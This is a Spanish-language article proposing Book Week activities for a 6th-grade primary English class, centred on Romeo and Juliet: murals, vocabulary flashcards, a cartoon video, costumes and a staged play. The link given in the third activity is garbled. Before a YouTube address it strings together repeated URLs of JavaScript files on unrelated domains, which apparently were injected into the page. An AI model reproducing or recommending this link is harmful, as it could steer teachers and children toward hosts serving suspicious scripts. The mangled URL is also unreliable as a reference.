SUGERENCIAS PARA LA SEMANA DEL LIBRO EN EL ÁREA DE LENGUAS EXTRANJERAS

Autora: María Benítez Sanz

          Como todos los años, el 23 de abril, o día de San Jorge, es celebrado en todos los centros el Día del libro. Aproximadamente en las fechas entre el 15 al 26 de abril tiene lugar la semana del libro en todos los centros. Podemos aprovechar esta semana para realizar una serie de actividades con las que trabajar no solo la lectura y la literatura, sino también el conocimiento de las lenguas extranjeras, en nuestro caso el inglés, y trabajar así de una forma interdisciplinar.

          En este artículo se proponen algunas actividades a realizar destinadas  al curso de 6º de primaria, dentro de la clase de inglés para esa semana del libro.

         Para realizar estas actividades vamos a partir de un proyecto, en el que trabajaremos la obra literaria tan conocida de William Shakespeare como es Romeo y Julieta o lo que es lo mismo en inglés Romeo and Juliet.

 

PRIMERA ACTIVIDAD:

         Se dividirá la clase en grupos de cuatro. A cada uno de ellos se le entregará un mural o una cartulina. Después deberán buscar en internet o en las enciclopedias información y fotografías sobre el autor, Shakespeare y la obra de Romeo y Julieta. Tras conseguir toda la información necesaria, pegarán en el mural dicha información y las fotografías. Se valorará el mural más original.

 

SEGUNDA ACTIVIDAD: En esta segunda actividad enseñaremos a los alumnos vocabulario en inglés que necesitarán para ver la película de Romeo y Julieta adaptada en inglés. Para ello, les presentaremos las palabras con flashcards, palabras como espada (sword), Montesco (montagues), capuletos (capulets), pilgrim (peregrino), veneno (poison), etc. Realizaremos diversos juegos con las flashcards como poner en orden, juegos de memoria o deletrear las flashcards.

 

TERCERA ACTIVIDAD: La tercera actividad consistirá en la visualización de un video de dibujos animados de Romeo y Julieta adaptado a los niños donde los alumnos podrán ver la historia completa, situarse en aquella época y aprender el vocabulario en contexto que ya ha sido introducido previamente.

Para ello, visitaremos el siguiente enlace de internet, donde podremos ver Romeo y Julieta por capítulos: http://middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&www.youtube.com/watch?v=zr1gk9nwTYY&feature=BF&list=PL8B976DA09DC11FE3&index=16

 

CUARTA ACTIVIDAD: Esta actividad nos llevará algo de más tiempo. Con la ayuda de los padres y demás profesores, confeccionaremos los trajes de la obra de Romeo y Julieta así como de los demás personajes que aparecen. Para ello utilizaremos ropas antiguas, sacos, espadas y camisas.

 

QUINTA ACTIVIDAD: La última actividad será una representación de la obra adaptada a los niños de Primaria. Para ello repartiremos a los niños un texto en inglés adaptado de la obra de Romeo y Julieta, repartiremos los personajes a los alumnos y durante unos días ensayaremos el texto, corregiremos la pronunciación e introduciremos algunas modificaciones. Finalmente la actividad teatral se representará en el salón de actos del colegio con la asistencia de padres y familiares. Para la representación podemos emplear una decoración de aquella época con cortinas, una cama para Julieta y otros elementos de aquélla época.

         Como vemos,  con este proyecto podemos trabajar no solo la literatura sino también el área de lenguas extranjeras, practicaremos las destrezas orales y escritas y los competencia lingüística, artística y cultural, así como la competencia digital en la búsqueda de información sobre la obra.

 

BIBLIOGRAFÍA:

  • Byrne. D., Teaching Oral English_ Longman, London, 1989.
  • Crystal, D. The Cambridge Encyclopaedia of Language. CUP Cambridge 1987.
  • The Primary English Teacher´s guide by Brewster.

 

WEBGRAFÍA:

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.